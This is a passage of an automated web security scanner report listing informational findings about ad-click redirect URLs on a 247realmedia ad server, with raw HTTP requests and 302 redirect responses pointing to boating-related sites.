Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

20.310. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1925968507/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1925968507/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1925968507/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.acboatshow.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1925968507/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:45:47 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 303
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

20.311. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1927937446/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1927937446/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1927937446/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.keenanauction.com/auction.cgi?&i=2039

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1927937446/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:57:41 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 328
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&amp;i=2039">here</a>
...[SNIP]...

20.312. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/19316522/x01/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/19316522/x01/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/19316522/x01/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.nsboats.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/19316522/x01/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:05:07 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 300
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

20.313. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1931966763/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1931966763/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1931966763/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.gssdesign.com/cmta_landing11/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1931966763/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:47:15 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 316
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here</a>
...[SNIP]...

20.314. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/193215144/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/193215144/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/193215144/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.nsboats.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/193215144/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:57:23 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 299
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

20.315. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1938188771/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1938188771/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1938188771/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1938188771/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:53:25 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

20.316. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1942186617/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1942186617/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1942186617/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.nsboats.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1942186617/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:49:14 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 299
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

20.317. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/194614025/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/194614025/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/194614025/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/194614025/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:54:50 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

20.318. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1949339220/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1949339220/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1949339220/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.acboatshow.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1949339220/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:56:39 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 302
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

20.319. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1953686413/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1953686413/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1953686413/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.gssdesign.com/cmta_landing11/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1953686413/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:45:50 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 316
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here</a>
...[SNIP]...

20.320. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1955658996/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1955658996/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1955658996/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.keenanauction.com/auction.cgi?&i=2039

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1955658996/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:56:57 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 328
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&amp;i=2039">here</a>
...[SNIP]...

20.321. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1956218158/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1956218158/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1956218158/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.nsboats.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1956218158/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:57:00 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 299
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

20.322. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1960309178/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1960309178/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1960309178/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1960309178/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:43:13 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

20.323. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1966543230/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1966543230/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1966543230/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1966543230/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:43:11 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

20.324. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1972223152/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1972223152/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
